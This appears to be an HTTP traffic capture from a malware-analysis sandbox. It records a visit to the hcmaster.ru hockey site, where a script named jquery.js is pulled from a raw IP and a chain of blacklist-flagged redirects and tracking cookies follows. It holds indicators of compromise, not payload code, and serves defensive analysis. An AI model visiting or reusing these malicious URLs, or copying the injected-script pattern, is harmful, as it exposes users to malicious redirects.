Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 5539
Connection: keep-alive
Last-Modified: Tue, 27 Jun 2017 07:11:32 GMT
Etag: "59520524-15a3"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01
Size:   5539
Md5:    9ceb8e42e73da73f66c0ceeb6e8ca058
Sha1:   bf3069ff95e5d47f35076091cdf0eb655dc5b745
Sha256: 8cbcde3fd6196d46287cea492a841c6d1b2f7a0d02a0dce897a395462f8ad0d6
                                        
                                            GET /assets/cache_image/source/news/1W0A2422_48x48_07f.jpg HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 6899
Connection: keep-alive
Last-Modified: Thu, 06 Jul 2017 11:25:03 GMT
Etag: "595e1e0f-1af3"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01
Size:   6899
Md5:    b2454ef4ddda278b0711e44be77c02ed
Sha1:   e6a1f07a3cf85a7fba1f82ce71156a598899113c
Sha256: 827f830ac45a172409e9e6eb0e3b4391a778eb9fb5ea6ae1a743e315f8f27015
                                        
                                            GET /assets/cache_image/source/news/3_48x48_07f.jpg HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 3209
Connection: keep-alive
Last-Modified: Wed, 21 Jun 2017 14:29:58 GMT
Etag: "594a82e6-c89"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01
Size:   3209
Md5:    4aeef2fc3b9dfb9b9822b16b996e29ca
Sha1:   eca8aeb298d068aff26e06b9ca6d3d75deae33a7
Sha256: a4eacb9f7d4d6252f074e2478adea4967cc17c0b7b930469a5ea48bd2f2ae058
                                        
                                            GET /assets/cache_image/source/news/2_48x48_07f.jpg HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 5393
Connection: keep-alive
Last-Modified: Mon, 19 Jun 2017 07:27:12 GMT
Etag: "59477cd0-1511"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01
Size:   5393
Md5:    91c363a815e62ddf263d18ceef3a1ae8
Sha1:   1ae147f207d03e3daf053a1c471b0b409614d613
Sha256: 309911aa165b993c9468ff1d7fc65deaa6b6b4c58f2ec2b38ae51e9ffcd1f2f2
                                        
                                            GET /assets/cache_image/source/news/1W0A7021_835x546_451.jpg HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 150428
Connection: keep-alive
Last-Modified: Fri, 13 Oct 2017 15:24:12 GMT
Etag: "59e0da9c-24b9c"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01
Size:   150428
Md5:    97804f504318b15e38b3c8906cfd2040
Sha1:   4f547e7628287e45d81ffcd6a8f2b587d84d3362
Sha256: f15f3a1d7ac4f9998e1373899b984c47d62e3d43ed5ed50747a5240e8ba46366
                                        
                                            GET /assets/template/image/image/fav1.ico HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: image/x-icon
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 1150
Connection: keep-alive
Last-Modified: Tue, 29 Nov 2016 21:13:52 GMT
Etag: "583def90-47e"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  MS Windows icon resource - 1 icon
Size:   1150
Md5:    f8a042598f0dd3bd6151fa77103dc56e
Sha1:   346efe07e2cab8c9cd58b8d668483d41f4611fea
Sha256: 044e42fd139f3c41d91f05de58f23715fe0df7e25e35c7a998ac9c8e5aba9ba2

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html

                                         
                                         172.217.21.138
HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
                                        
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
Expires: Mon, 11 Feb 2019 05:48:58 GMT
Date: Mon, 11 Feb 2019 05:48:58 GMT
Cache-Control: private, max-age=86400
Content-Encoding: gzip
Server: ESF
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Alt-Svc: quic=":443"; ma=2592000; v="44,43,39"
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   381
Md5:    e7dbb6ebf669a87d671c5c9ed34fe3a0
Sha1:   e07db8975bcf73a303a90a98de03e33d8a9a0a38
Sha256: f5d48c27ea25a908e67791dd5d0206e5bd3e3b402b2186fc79281cb61b5dca60
                                        
                                            GET /css?family=Roboto:400,100,100italic,300,300italic,400italic,500,500italic,700,700italic,900,900italic&subset=latin,cyrillic HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html

                                         
                                         172.217.21.138
HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
                                        
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
Expires: Mon, 11 Feb 2019 05:48:58 GMT
Date: Mon, 11 Feb 2019 05:48:58 GMT
Cache-Control: private, max-age=86400
Content-Encoding: gzip
Server: ESF
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Alt-Svc: quic=":443"; ma=2592000; v="44,43,39"
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   404
Md5:    cd0c1d46dae1ebeca01491a4a144fb71
Sha1:   4a05780c1a62d0cbf5cc514ae17e8bed10adf81c
Sha256: 37986b592bacbbec79e2375a5b9ae4f83e779809d75b3a75f3415d4b50baa42c
                                        
                                            GET /css?family=Roboto+Condensed:400,300,300italic,400italic,700&subset=latin,cyrillic HTTP/1.1 
Host: fonts.googleapis.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html

                                         
                                         172.217.21.138
HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
                                        
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
Expires: Mon, 11 Feb 2019 05:48:58 GMT
Date: Mon, 11 Feb 2019 05:48:58 GMT
Cache-Control: private, max-age=86400
Content-Encoding: gzip
Server: ESF
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Alt-Svc: quic=":443"; ma=2592000; v="44,43,39"
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   320
Md5:    3e067abf55c10f26f712c4eb98e80e23
Sha1:   c8a6b56c5f10bcb3f5e837f80066964a47fca35a
Sha256: 402d6e74586ed6d9aebe6dde6790de550e4b91356087218da34c15de814c8d2a
                                        
                                            GET /source/mainBanner/11111111.jpg HTTP/1.1 
Host: hcmaster.ru
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html
Cookie: PHPSESSID=c97aa3d1e43f7f3e880616a87758e2b7; browser=standard

                                         
                                         195.208.1.119
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Server: nginx/1.12.2
Date: Mon, 11 Feb 2019 05:48:57 GMT
Content-Length: 472405
Connection: keep-alive
Last-Modified: Tue, 13 Sep 2016 22:39:38 GMT
Etag: "57d8802a-73555"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  JPEG image data, EXIF standard
Size:   472405
Md5:    18ebed31cce34f6190c95f2a96a537e3
Sha1:   370f58007f895f852dba1cbd4405807757f160b4
Sha256: f1d6b2b2776b5b0bb9bdc6a3ece8206f1c45ce842c231880cbcf28ab5b462e4c
                                        
                                            GET /jquery.js HTTP/1.1 
Host: 134.249.116.78
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html

                                         
                                         134.249.116.78
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Mon, 11 Feb 2019 05:49:18 GMT
Server: Apache/2.4.34 (Win32) PHP/7.2.10
Last-Modified: Thu, 07 Feb 2019 21:20:08 GMT
Etag: "11c1-58154682ae354"
Accept-Ranges: bytes
Content-Length: 4545
Connection: close


--- Additional Info ---
Magic:  ASCII C++ program text, with very long lines
Size:   4545
Md5:    d17c10f0297ea2a06e59f222f5ff0d2c
Sha1:   078fd626626045072bc27cac292090d16095ba90
Sha256: a3eb27a47f44d87b1487fc4b5de8e929d17a44dcc37a9b62650e5d5f3a3eff01

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /?key=jELb8ThlZZ0lGKvjzQy021gUsAZQSACs HTTP/1.1 
Host: 185.143.221.14
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hcmaster.ru/the-coaching-staff/master/master/master/the-coaching-staff/roman-korolev.html

                                         
                                         185.143.221.14
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Mon, 11 Feb 2019 05:49:18 GMT
Server: Apache/2.4.34 (Win32) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: __cfuid=1; expires=Wed, 13-Feb-2019 05:49:18 GMT; Max-Age=172800
Content-Length: 705
Connection: close


--- Additional Info ---
Magic:  HTML document text
Size:   705
Md5:    aca94966940ad322f2b794f040772822
Sha1:   8260c40fc2907b0eadd3caee31ca16dd9a269e5e
Sha256: 1bfba15c5ddf08da9f0dafbe7569f7c31a3904e07cda9da1bfb25777f154a9f3

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: 185.143.221.14
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: __cfuid=1

                                         
                                         185.143.221.14
HTTP/1.1 200 OK
Content-Type: image/x-icon
                                        
Date: Mon, 11 Feb 2019 05:49:18 GMT
Server: Apache/2.4.34 (Win32) PHP/7.2.10
Last-Modified: Mon, 11 Dec 2017 09:00:56 GMT
Etag: "1536-5600cc5aee200"
Accept-Ranges: bytes
Content-Length: 5430
Connection: close


--- Additional Info ---
Magic:  MS Windows icon resource - 2 icons, 16x16, 256-colors
Size:   5430
Md5:    f3418a443e7d841097c714d69ec4bcb8
Sha1:   49263695f6b0cdd72f45cf1b775e660fdc36c606
Sha256: 6da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770
                                        
                                            POST / HTTP/1.1 
Host: ocsp.int-x3.letsencrypt.org
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 117
Content-Type: application/ocsp-request

                                         
                                         91.135.34.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 527
Etag: "50C945FB84E992C967B04E8CEA145A8BC184329A06FA457E05E84746F6B1F206"
Last-Modified: Fri, 08 Feb 2019 00:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=4795
Expires: Mon, 11 Feb 2019 07:09:14 GMT
Date: Mon, 11 Feb 2019 05:49:19 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   527
Md5:    4d82e31e88ebecd8608543ea34072547
Sha1:   773142e86d6180c9ad6b226a4185e3c2385cec73
Sha256: 50c945fb84e992c967b04e8cea145a8bc184329a06fa457e05e84746f6b1f206
                                        
                                            POST / HTTP/1.1 
Host: isrg.trustid.ocsp.identrust.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         91.135.34.121
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Content-Transfer-Encoding: Binary
Last-Modified: Thu, 07 Feb 2019 23:55:28 GMT
Etag: "51ffedd62653676c120a8c4d143b0fbf59c8409b"
Content-Length: 1398
Cache-Control: public, no-transform, must-revalidate, max-age=22366
Expires: Mon, 11 Feb 2019 12:02:05 GMT
Date: Mon, 11 Feb 2019 05:49:19 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   1398
Md5:    745f16ad26febf7092c2ff8f53a4327b
Sha1:   51ffedd62653676c120a8c4d143b0fbf59c8409b
Sha256: b9b9e714c2ced9f51a984f64ca55297e130fe38353ad449207659377d6cbe837
                                        
                                            GET /ykwnsxwz29?key=9a98439e5dcdf4fd2a011f7cbc76b00d HTTP/1.1 
Host: sd5doozry8.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://185.143.221.14/?key=jELb8ThlZZ0lGKvjzQy021gUsAZQSACs

                                         
                                         198.134.112.242
HTTP/1.1 200 OK
Content-Type: text/html
                                        
Server: nginx/1.15.1
Date: Mon, 11 Feb 2019 05:49:19 GMT
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: u_pl=14857833; expires=Tue, 12 Feb 2019 05:49:19 GMT ain=eyJhbGciOiJIUzI1NiJ9.eyJwIjp7ICJpZCI6MTQ4NTc4MzMsImsiOiI5YTk4NDM5ZTVkY2RmNGZkMmEwMTFmN2NiYzc2YjAwZCIsInNpZCI6IiIsImlzaWQiOjIsImFzaWQiOjEsInppZCI6MTEyNjg3LCJwaWQiOjg5Njk4LCJhbiI6dHJ1ZSwibGFuIjp0cnVlLCJjaWQiOjI4LCJhaWQiOjI4LCJwdCI6NCwicGsiOiJ5a3duc3h3ejI5In0sInUiOnsidSI6MSwiYXUiOjEsImQiOnsiaWQiOjEwNDUwNiwiaWMiOmZhbHNlLCJuIjoiRGVza3RvcHxFbXVsYXRvciIsInYiOiJVbmtub3duIiwibSI6IlVua25vd24iLCJmIjoxLCJmbiI6IkRlc2t0b3AiLCJvaWQiOjcxMzMsIm9uIjoiV2luZG93cyIsIm92IjoiNyIsImJpZCI6MTc1NTgsImJuIjoiRmlyZWZveCIsImJ2IjoiMy42Iiwid3YiOmZhbHNlLCJlIjpmYWxzZSwiYWIiOmZhbHNlfSwiYyI6eyJpZCI6MTYyLCJjIjoiTk8iLCJuIjoiTm9yd2F5In0sImEiOmZhbHNlLCJjciI6eyJuIjoiQnJvYWRuZXQgQVMifSwieGYiOiIiLCJpeGYiOmZhbHNlLCJpZ3hmIjpmYWxzZSwidXAiOnRydWUsInIiOiJodHRwOi8vMTg1LjE0My4yMjEuMTQvP2tleT1qRUxiOFRobFpaMGxHS3ZqelF5MDIxZ1VzQVpRU0FDcyJ9fQ.RGaQUOIuZbZyyL56NTIFe0qZ63jnOdMNIAMm6uVgIdg; expires=Mon, 11 Feb 2019 05:50:19 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Strict-Transport-Security: max-age=0; includeSubdomains
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   1252
Md5:    05f3726e80a796fec4aa639ae311f5d1
Sha1:   e1f5b77789584a5b8e4e6dae4807ae58bf44b7aa
Sha256: 0e2c9ad78a98b23670fcca35592b09646f6bf6691fe727e48faf4da8e278ede2

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            POST / HTTP/1.1 
Host: ocsp.int-x3.letsencrypt.org
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 117
Content-Type: application/ocsp-request

                                         
                                         91.135.34.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 527
Etag: "3B400D8A7A220E3A7AD7562F265B1B184A9B42CD5D87CAD11C6D35CE09E2BC53"
Last-Modified: Sat, 09 Feb 2019 00:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=29765
Expires: Mon, 11 Feb 2019 14:05:24 GMT
Date: Mon, 11 Feb 2019 05:49:19 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   527
Md5:    2135a8c4e4bbab6cd296efa15a025d38
Sha1:   1abd34998ed30f8a9e5a51e7fd17438bf41826a4
Sha256: 3b400d8a7a220e3a7ad7562f265b1b184a9b42cd5d87cad11c6d35ce09e2bc53
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: sd5doozry8.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: u_pl=14857833; ain=eyJhbGciOiJIUzI1NiJ9.eyJwIjp7ICJpZCI6MTQ4NTc4MzMsImsiOiI5YTk4NDM5ZTVkY2RmNGZkMmEwMTFmN2NiYzc2YjAwZCIsInNpZCI6IiIsImlzaWQiOjIsImFzaWQiOjEsInppZCI6MTEyNjg3LCJwaWQiOjg5Njk4LCJhbiI6dHJ1ZSwibGFuIjp0cnVlLCJjaWQiOjI4LCJhaWQiOjI4LCJwdCI6NCwicGsiOiJ5a3duc3h3ejI5In0sInUiOnsidSI6MSwiYXUiOjEsImQiOnsiaWQiOjEwNDUwNiwiaWMiOmZhbHNlLCJuIjoiRGVza3RvcHxFbXVsYXRvciIsInYiOiJVbmtub3duIiwibSI6IlVua25vd24iLCJmIjoxLCJmbiI6IkRlc2t0b3AiLCJvaWQiOjcxMzMsIm9uIjoiV2luZG93cyIsIm92IjoiNyIsImJpZCI6MTc1NTgsImJuIjoiRmlyZWZveCIsImJ2IjoiMy42Iiwid3YiOmZhbHNlLCJlIjpmYWxzZSwiYWIiOmZhbHNlfSwiYyI6eyJpZCI6MTYyLCJjIjoiTk8iLCJuIjoiTm9yd2F5In0sImEiOmZhbHNlLCJjciI6eyJuIjoiQnJvYWRuZXQgQVMifSwieGYiOiIiLCJpeGYiOmZhbHNlLCJpZ3hmIjpmYWxzZSwidXAiOnRydWUsInIiOiJodHRwOi8vMTg1LjE0My4yMjEuMTQvP2tleT1qRUxiOFRobFpaMGxHS3ZqelF5MDIxZ1VzQVpRU0FDcyJ9fQ.RGaQUOIuZbZyyL56NTIFe0qZ63jnOdMNIAMm6uVgIdg; cjs=t

                                         
                                         198.134.112.242
HTTP/1.1 200 OK
Content-Type: image/x-icon
                                        
Server: nginx/1.15.1
Date: Mon, 11 Feb 2019 05:49:19 GMT
Content-Length: 0
Connection: keep-alive
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Strict-Transport-Security: max-age=0; includeSubdomains


--- Additional Info ---
                                        
                                            GET /stats HTTP/1.1 
Host: r.remarketingpixel.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://sd5doozry8.com/ykwnsxwz29?key=9a98439e5dcdf4fd2a011f7cbc76b00d
Origin: https://sd5doozry8.com

                                         
                                         23.111.224.2
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Server: nginx/1.15.1
Date: Mon, 11 Feb 2019 05:49:19 GMT
Content-Length: 40
Connection: keep-alive
Access-Control-Allow-Origin: https://sd5doozry8.com
Access-Control-Allow-Credentials: true
Set-Cookie: uid_id2=36897205-e8c5-41ed-84d3-ab468cac02d8:2:1; expires=Thu, 08 Feb 2029 05:49:19 GMT; domain=.remarketingpixel.com
Expires: Mon, 11 Feb 2019 05:49:19 GMT
Cache-Control: max-age=0, : no-cache


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   40
Md5:    14ed48c42fffba1fbdb3f47ee44991c4
Sha1:   e15abab7db77baafacbe2079ebbe83cd4a58d309
Sha256: f9e35394bfda52babd08b1cc37fb4a6c405b43beb2cd64eee7ec225d464f00ca
                                        
                                            GET /ykwnsxwz29?shu=88a5e0f3b4401f8c8e5ed104d13df1b0b591addb491339a85c9da2b6155a5403e7ebc1af522db5f83d3985b5efe39d1dc159962c981e91581af414f239a0fbc122588bb5e1834528d5&pst=1549864219&rmtc=t&uuid=36897205-e8c5-41ed-84d3-ab468cac02d8%3A2%3A1&pii=&in=false&refer=http%3A%2F%2F185.143.221.14%2F%3Fkey%3DjELb8ThlZZ0lGKvjzQy021gUsAZQSACs&key=9a98439e5dcdf4fd2a011f7cbc76b00d HTTP/1.1 
Host: sd5doozry8.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://sd5doozry8.com/ykwnsxwz29?key=9a98439e5dcdf4fd2a011f7cbc76b00d
